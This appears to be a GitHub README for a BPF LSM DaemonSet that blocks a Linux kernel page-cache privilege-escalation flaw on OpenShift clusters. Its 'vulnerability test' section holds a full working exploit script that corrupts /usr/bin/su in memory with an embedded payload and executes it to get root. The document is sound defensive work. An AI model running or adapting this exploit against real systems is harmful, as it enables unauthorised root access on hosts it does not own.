mrunalp/block-copyfail
GitHub: mrunalp/block-copyfail
A BPF LSM-based DaemonSet that immediately blocks the CVE-2026-31431 kernel privilege-escalation exploit chain without rebooting OpenShift nodes.
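## Summary
CVE-2026-31431 ("Copy Fail") is a Linux kernel privilege-escalation vulnerability
in the `algif_aead` crypto interface. An attacker uses an AF\_ALG socket with the
`authencesn` algorithm and `splice()` to corrupt arbitrary files in the kernel
page cache, including setuid binaries such as `/usr/bin/su`.
This document provides a **zero-reboot fix** using a BPF LSM DaemonSet that
blocks only binds to the vulnerable `authencesn` algorithm. The fix has been
tested end to end on three independent OCP 4.22 clusters.
## Quick Start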
```
# 1. Verify that BPF LSM is enabled (the default on RHEL CoreOS 9.8)
oc debug node/ -- chroot /host cat /sys/kernel/security/lsm
# The output must include "bpf"
# 2. Deploy the namespace and grant the privileged SCC
oc apply -f daemonset.yaml
oc adm policy add-scc-to-user privileged -z default -n block-copyfail
# 3. The DaemonSet pods start automatically on all nodes
# 4. Verify
oc get pods -n block-copyfail # All nodes should show Running
oc logs -n block-copyfail -l app=block-copyfail
# Expected: "block-copyfail: blocker active — authencesn bind blocked"
```
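No reboot. No node drain. No pod restarts. Protection takes effect immediately
and covers all processes on all nodes (100% coverage).
## Table of Contents
1. [How the Exploit Works](#how-the-exploit-works)
2. [Confirming Vulnerability on Your Cluster](#confirming-vulnerability-on-your-cluster)
3. [BPF LSM DaemonSet Deployment](#bpf-lsm-daemonset-deployment)
4. [Post-Deployment Verification](#post-deployment-verification)
5. [Building the Image from Source](#building-the-image-from-source)
6. [Removal](#removal)
## How the Exploit Works
The exploit chains three kernel features:
1. **AF\_ALG socket**: creates a userspace handle to kernel crypto via
`socket(AF_ALG, SOCK_SEQPACKET, 0)`
2. **AEAD bind**: binds to `authencesn(hmac(sha256),cbc(aes))`, a specific
authenticated-encryption algorithm
3. **splice() + sendmsg()**: the kernel wrongly performs an "in-place" operation
when the source and destination page mappings differ, corrupting the page cache of a read-only file
The attacker corrupts `/usr/bin/su` in the page cache (no write permission on the file is needed)
and then executes it to gain root.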
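
The first two links of the chain (socket creation and the AEAD bind) can be probed on their own, without touching any file. The following is a minimal sketch, not part of the repository: the helper name `probe_af_alg_bind` and its three return values are hypothetical, and it only reports whether the bind that the mitigation targets would be accepted on the current host.

```python
import errno
import socket


def probe_af_alg_bind(alg_type: str, alg_name: str) -> str:
    """Return 'allowed', 'blocked', or 'unavailable' for an AF_ALG bind.

    Hypothetical helper for illustration; it performs no splice() and
    modifies nothing.
    """
    af_alg = getattr(socket, "AF_ALG", None)  # absent on non-Linux builds
    if af_alg is None:
        return "unavailable"
    try:
        sock = socket.socket(af_alg, socket.SOCK_SEQPACKET, 0)
    except OSError:
        return "unavailable"  # AF_ALG sockets cannot be created here
    try:
        sock.bind((alg_type, alg_name))
        return "allowed"
    except OSError as exc:
        # EPERM is the error shown in this document's blocked runs.
        if exc.errno in (errno.EPERM, errno.EACCES):
            return "blocked"
        return "unavailable"  # e.g. the algorithm is not present in this kernel
    finally:
        sock.close()


if __name__ == "__main__":
    print(probe_af_alg_bind("aead", "authencesn(hmac(sha256),cbc(aes))"))
```

A result of `allowed` only means the bind succeeds; it does not by itself prove that the kernel is vulnerable.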
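## Confirming Vulnerability on Your Cluster
### Step 1: Save the test script
Save the following as `cve_test.py`. It reproduces the original exploit's page-cache
corruption against `/usr/bin/su` using the same payload. The corruption affects only
the container's overlayfs copy, not the host.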
```
#!/usr/bin/env python3
"""CVE-2026-31431 vulnerability test targeting /usr/bin/su."""
import os, sys, socket, hashlib, zlib, ctypes, ctypes.util, subprocess

libc = ctypes.CDLL(ctypes.util.find_library("c"))
libc.splice.argtypes = [
    ctypes.c_int, ctypes.POINTER(ctypes.c_longlong),
    ctypes.c_int, ctypes.POINTER(ctypes.c_longlong),
    ctypes.c_size_t, ctypes.c_uint,
]
libc.splice.restype = ctypes.c_longlong


def _splice(fd_in, fd_out, length, offset_src=None):
    if offset_src is not None:
        off = ctypes.c_longlong(offset_src)
        return libc.splice(fd_in, ctypes.byref(off), fd_out, None, length, 0)
    return libc.splice(fd_in, None, fd_out, None, length, 0)


def d(x):
    return bytes.fromhex(x)


def try_corrupt(fd, offset, payload):
    SOL_ALG = 279
    try:
        a = socket.socket(38, 5, 0)
    except OSError as e:
        print(f" AF_ALG socket creation failed: {e}")
        return False
    try:
        a.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
    except OSError as e:
        print(f" AF_ALG bind failed: {e}")
        a.close()
        return False
    try:
        a.setsockopt(SOL_ALG, 1, d('0800010000000010' + '0' * 64))
        a.setsockopt(SOL_ALG, 5, None, 4)
        u, _ = a.accept()
        o = offset + 4
        z = d('00')
        u.sendmsg(
            [b"A" * 4 + payload],
            [(SOL_ALG, 3, z * 4),
             (SOL_ALG, 2, b'\x10' + z * 19),
             (SOL_ALG, 4, b'\x08' + z * 3)],
            32768,
        )
        r, w = os.pipe()
        _splice(fd, w, o, offset_src=0)
        _splice(r, u.fileno(), o)
        try:
            u.recv(8 + offset)
        except Exception:
            pass
        os.close(r)
        os.close(w)
        u.close()
    except OSError as e:
        print(f" Exploit step failed: {e}")
        a.close()
        return False
    a.close()
    return True


TARGET = "/usr/bin/su"
print("=== CVE-2026-31431 Vulnerability Test ===")
print(f"Target: {TARGET}")
print()
with open(TARGET, "rb") as f:
    orig_hash = hashlib.sha256(f.read()).hexdigest()
print(f"Original SHA256: {orig_hash}")
payload = zlib.decompress(d(
    "78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d"
    "209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675"
    "c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"
))
fd = os.open(TARGET, os.O_RDONLY)
i = 0
ok = True
print(f"Attempting splice + AF_ALG page-cache corruption "
      f"({len(payload)} bytes in {len(payload)//4} chunks)...")
while i < len(payload):
    if not try_corrupt(fd, i, payload[i:i+4]):
        ok = False
        break
    i += 4
os.close(fd)
if not ok:
    print()
    print("RESULT: CANNOT TEST - AF_ALG or splice not available/permitted")
    sys.exit(2)
with open(TARGET, "rb") as f:
    after_hash = hashlib.sha256(f.read()).hexdigest()
print(f"After SHA256: {after_hash}")
print()
if orig_hash != after_hash:
    print("PAGE CACHE CORRUPTION: YES - /usr/bin/su was modified in the page cache")
else:
    print("PAGE CACHE CORRUPTION: NO - /usr/bin/su is intact")
    print()
    print("RESULT: NOT VULNERABLE")
    sys.exit(0)
print()
print("Attempting to execute corrupted /usr/bin/su ...")
try:
    r = subprocess.run([TARGET, "-c", "id"], capture_output=True, timeout=5)
    stdout = r.stdout.decode(errors="replace").strip()
    stderr = r.stderr.decode(errors="replace").strip()
    print(f" exit code: {r.returncode}")
    if stdout:
        print(f" stdout: {stdout}")
    if stderr:
        print(f" stderr: {stderr}")
    if "uid=0" in stdout:
        print()
        print("RESULT: FULLY EXPLOITABLE - gained root via corrupted su")
    else:
        print()
        print("RESULT: PARTIALLY MITIGATED")
        print(" Page-cache corruption succeeded (kernel is vulnerable)")
        print(" Privilege escalation blocked (allowPrivilegeEscalation=false)")
except Exception as e:
    print(f" execution failed: {e}")
    print()
    print("RESULT: PARTIALLY MITIGATED")
    print(" Page-cache corruption succeeded (kernel is vulnerable)")
    print(" Corrupted binary could not execute")
```
### Step 2: Run the test on the cluster
```
oc create namespace cve-test
oc create configmap cve-test-script -n cve-test --from-file=cve_test.py
cat <<'EOF' | oc apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: cve-test
  namespace: cve-test
  annotations:
    openshift.io/required-scc: restricted-v2
spec:
  restartPolicy: Never
  containers:
  - name: test
    image: registry.access.redhat.com/ubi9/python-39:latest
    command: ["python3", "/scripts/cve_test.py"]
    volumeMounts:
    - name: script
      mountPath: /scripts
      readOnly: true
  volumes:
  - name: script
    configMap:
      name: cve-test-script
EOF
```
### Step 3: Check the results
```
oc wait pod/cve-test -n cve-test \
--for=jsonpath='{.status.phase}'=Succeeded --timeout=120s
oc logs -n cve-test cve-test
```
**On a vulnerable cluster**, you will see:
```
=== CVE-2026-31431 Vulnerability Test ===
Target: /usr/bin/su
Original SHA256: 8969560ae8e6e21c6184c1451f59418822ee69dd5d946d71987b55236bbc0feb
Attempting splice + AF_ALG page-cache corruption (160 bytes in 40 chunks)...
After SHA256: 30b0f5b5a054c4df65b48ca792863bf7054b4d793f15f57163792ba6c2b151ae
PAGE CACHE CORRUPTION: YES - /usr/bin/su was modified in the page cache
Attempting to execute corrupted /usr/bin/su ...
exit code: 0
RESULT: PARTIALLY MITIGATED
Page-cache corruption succeeded (kernel is vulnerable)
Privilege escalation blocked (allowPrivilegeEscalation=false)
```
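
When the test is run against several clusters, the verdict can be pulled out of the pod log mechanically. The sketch below relies only on the `RESULT:` strings printed by `cve_test.py`; the function names `extract_result` and `kernel_is_vulnerable` are hypothetical helpers, not part of the repository.

```python
from typing import Optional


def extract_result(log_text: str) -> Optional[str]:
    """Return the text after the first 'RESULT:' marker, or None if absent."""
    for line in log_text.splitlines():
        stripped = line.strip()
        if stripped.startswith("RESULT:"):
            return stripped[len("RESULT:"):].strip()
    return None


def kernel_is_vulnerable(result: Optional[str]) -> Optional[bool]:
    """Map a RESULT string to True/False, or None when the test was inconclusive."""
    if result is None or result.startswith("CANNOT TEST"):
        return None
    if result.startswith("NOT VULNERABLE"):
        return False
    # Both of these are printed only after page-cache corruption succeeded.
    if result.startswith(("FULLY EXPLOITABLE", "PARTIALLY MITIGATED")):
        return True
    return None  # unknown RESULT text: do not guess


sample = """\
PAGE CACHE CORRUPTION: YES - /usr/bin/su was modified in the page cache
RESULT: PARTIALLY MITIGATED
"""
verdict = extract_result(sample)
print(verdict, kernel_is_vulnerable(verdict))
```

Note that `PARTIALLY MITIGATED` still counts as a vulnerable kernel: the page cache was corrupted, and only the final privilege escalation was stopped.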
### Step 4: Clean up
```
oc delete namespace cve-test
```
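## BPF LSM DaemonSet Deployment
The BPF LSM approach hooks `socket_bind` at the kernel level and blocks only
binds to the `authencesn` algorithm. It is based on
[block-copyfail](https://github.com/atgreen/block-copyfail), rewritten in C
with libbpf to simplify deployment on OCP.
### Prerequisites
BPF LSM must be enabled. It is enabled by default on RHEL CoreOS 9.8 (OCP 4.22).
Verify with: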
```
oc debug node/ -- chroot /host cat /sys/kernel/security/lsm
```
The expected output includes `bpf`:
```
lockdown,capability,landlock,yama,selinux,bpf
```
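
If this check needs to be scripted across many nodes, the comma-separated list can be parsed rather than matched as a substring, so that an LSM whose name merely contains "bpf" would not produce a false positive. A minimal sketch, with `bpf_lsm_enabled` as a hypothetical helper name:

```python
def bpf_lsm_enabled(lsm_line: str) -> bool:
    """Return True if 'bpf' is one of the LSMs in /sys/kernel/security/lsm output."""
    active = [name.strip() for name in lsm_line.strip().split(",")]
    return "bpf" in active


print(bpf_lsm_enabled("lockdown,capability,landlock,yama,selinux,bpf"))
```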
If `bpf` is **not** present, a one-time MachineConfig is required (this is the
only scenario that needs a reboot):
```
apiVersion: machineconfiguration.openshift.io/v1
kind: MachineConfig
metadata:
  labels:
    machineconfiguration.openshift.io/role: worker
  name: 99-enable-bpf-lsm
spec:
  kernelArguments:
    - lsm=lockdown,capability,selinux,bpf
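### Step 1: Create the namespace, grant the SCC, and deploy
The privileged SCC must be granted before the DaemonSet pods are created;
otherwise pod creation fails with an SCC validation error.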
```
# Create the namespace
cat <<'EOF' | oc apply -f -
apiVersion: v1
kind: Namespace
metadata:
  name: block-copyfail
  labels:
    pod-security.kubernetes.io/enforce: privileged
    pod-security.kubernetes.io/audit: privileged
    pod-security.kubernetes.io/warn: privileged
EOF
# Grant the privileged SCC to the default service account
oc adm policy add-scc-to-user privileged -z default -n block-copyfail
# Deploy the DaemonSet
cat <<'EOF' | oc apply -f -
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: block-copyfail
  namespace: block-copyfail
  labels:
    app: block-copyfail
spec:
  selector:
    matchLabels:
      app: block-copyfail
  template:
    metadata:
      labels:
        app: block-copyfail
    spec:
      priorityClassName: system-node-critical
      tolerations:
      - operator: Exists
      containers:
      - name: blocker
        image: quay.io/mrunalp/block-copyfail:latest
        securityContext:
          privileged: true
        volumeMounts:
        - name: bpf
          mountPath: /sys/fs/bpf
        - name: btf
          mountPath: /sys/kernel/btf/vmlinux
          readOnly: true
        resources:
          requests:
            cpu: 10m
            memory: 32Mi
          limits:
            cpu: 100m
            memory: 64Mi
      volumes:
      - name: bpf
        hostPath:
          path: /sys/fs/bpf
          type: DirectoryOrCreate
      - name: btf
        hostPath:
          path: /sys/kernel/btf/vmlinux
          type: File
      terminationGracePeriodSeconds: 5
EOF
```
### Step 2: Wait for pods to start on all nodes
```
oc get pods -n block-copyfail -o wide
```
Expected: one pod per node, all in the `Running` state:
```
NAME                   READY   STATUS    AGE   NODE
block-copyfail-2jhzf   1/1     Running   34s   ci-...-master-2
block-copyfail-4dfq7   1/1     Running   34s   ci-...-master-1
block-copyfail-c2ts8   1/1     Running   34s   ci-...-worker-c
block-copyfail-ctblk   1/1     Running   34s   ci-...-worker-a
block-copyfail-m26sx   1/1     Running   34s   ci-...-worker-b
block-copyfail-xsh6d   1/1     Running   34s   ci-...-master-0
```
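
On larger clusters, checking "one Running pod per node" by eye is error-prone. The sketch below shows one way to compare a node list against the pod list; it assumes the pod data is the JSON produced by `oc get pods -n block-copyfail -o json` and reads only the standard `spec.nodeName` and `status.phase` fields. The function name and the node names in the example are hypothetical.

```python
from typing import Iterable, List, Mapping


def nodes_without_running_pod(node_names: Iterable[str], pod_list: Mapping) -> List[str]:
    """Return the nodes that have no blocker pod in the Running phase."""
    covered = {
        pod.get("spec", {}).get("nodeName")
        for pod in pod_list.get("items", [])
        if pod.get("status", {}).get("phase") == "Running"
    }
    return sorted(name for name in node_names if name not in covered)


# Hypothetical data for illustration only.
pods = {
    "items": [
        {"spec": {"nodeName": "node-a"}, "status": {"phase": "Running"}},
        {"spec": {"nodeName": "node-b"}, "status": {"phase": "Pending"}},
    ]
}
print(nodes_without_running_pod(["node-a", "node-b"], pods))  # prints ['node-b']
```

An empty list means every listed node is covered; any node returned here is still unprotected.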
### Step 3: Verify the blocker is active
```
oc logs -n block-copyfail -l app=block-copyfail
```
Expected:
```
block-copyfail: blocker active — authencesn bind blocked
```
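## Post-Deployment Verification
Re-run the same exploit test from the [Confirming Vulnerability on Your Cluster](#confirming-vulnerability-on-your-cluster) section.
Because `cve_test.py` exits with status 2 when the bind is refused, the test pod ends in the `Failed` phase rather than `Succeeded`, so read the result with `oc logs` instead of waiting for `Succeeded`.
**After deploying the BPF LSM DaemonSet**, the output will be: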
```
=== CVE-2026-31431 Vulnerability Test ===
Target: /usr/bin/su
Original SHA256: 30b0f5b5a054c4df65b48ca792863bf7054b4d793f15f57163792ba6c2b151ae
Attempting splice + AF_ALG page-cache corruption (160 bytes in 40 chunks)...
AF_ALG bind failed: [Errno 1] Operation not permitted
RESULT: CANNOT TEST - AF_ALG or splice not available/permitted
```
The DaemonSet logs show the blocked attempt:
```
oc logs -n block-copyfail -l app=block-copyfail
```
```
block-copyfail: blocker active — authencesn bind blocked
block-copyfail: BLOCKED pid=16777 comm=python3 time=2026-05-01 16:37:23
```
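
The `BLOCKED` lines are regular enough to feed into alerting or an audit trail. The following sketch parses them with a regular expression derived from the single sample line above; the exact log format is therefore an assumption (for example, a `comm` value containing spaces would not match), and `parse_blocked` is a hypothetical helper name.

```python
import re
from datetime import datetime
from typing import Optional

# Pattern inferred from the one sample line shown in this document.
BLOCKED_RE = re.compile(
    r"^block-copyfail: BLOCKED pid=(?P<pid>\d+) comm=(?P<comm>\S+) "
    r"time=(?P<time>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})$"
)


def parse_blocked(line: str) -> Optional[dict]:
    """Parse one BLOCKED log line into pid, comm, and time; None if it does not match."""
    match = BLOCKED_RE.match(line.strip())
    if match is None:
        return None
    return {
        "pid": int(match.group("pid")),
        "comm": match.group("comm"),
        "time": datetime.strptime(match.group("time"), "%Y-%m-%d %H:%M:%S"),
    }


event = parse_blocked("block-copyfail: BLOCKED pid=16777 comm=python3 time=2026-05-01 16:37:23")
print(event["pid"], event["comm"], event["time"].isoformat())
```

Lines that are not block events, such as the startup banner, return `None` and can be skipped.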
### Verify other algorithms are unaffected
Run `verify-algos.py` on a node to confirm that only `authencesn` is blocked
and that other AF\_ALG algorithms (GCM, CCM, SHA-256, AES-CBC) keep working:
```
oc debug node/ -- chroot /host python3 -c "
import socket
tests = [
    ('aead', 'gcm(aes)'),
    ('aead', 'ccm(aes)'),
    ('aead', 'rfc4106(gcm(aes))'),
    ('hash', 'sha256'),
    ('skcipher', 'cbc(aes)'),
    ('aead', 'authencesn(hmac(sha256),cbc(aes))'),
]
for t, n in tests:
    s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
    try:
        s.bind((t, n))
        print(f' ALLOWED {t}/{n}')
    except OSError as e:
        print(f' BLOCKED {t}/{n} -- {e}')
    finally:
        s.close()
"
```
Expected output:
```
ALLOWED aead/gcm(aes)
ALLOWED aead/ccm(aes)
ALLOWED aead/rfc4106(gcm(aes))
ALLOWED hash/sha256
ALLOWED skcipher/cbc(aes)
BLOCKED aead/authencesn(hmac(sha256),cbc(aes)) -- [Errno 1] Operation not permitted
```
This confirms that the BPF LSM blocks only the vulnerable algorithm.
## Building the Image from Source
The source for the BPF LSM blocker is in `block-copyfail/`:
```
block-copyfail/
  block_copyfail.bpf.c   # BPF kernel program (LSM hook)
  block_copyfail.c       # Userspace loader (libbpf skeleton)
  block_copyfail.h       # Shared event struct
  Makefile               # Build pipeline
  Dockerfile             # Multi-stage build
  daemonset.yaml         # Namespace + DaemonSet manifest
  trigger-test.py        # Quick validation script
```
Build and push:
```
cd block-copyfail/
podman build -t quay.io//block-copyfail:latest .
podman push quay.io//block-copyfail:latest
```
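The Dockerfile uses a multi-stage build: Fedora with clang/bpftool/libbpf-devel
for compilation, and UBI 9 minimal as the runtime image (about 122 MB).
## Removal
Deleting the DaemonSet immediately removes the mitigation from all nodes: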
```
oc delete -f daemonset.yaml
# or
oc delete namespace block-copyfail
```
The BPF program detaches automatically when the loader process exits. No node
reboot or pod restart is needed.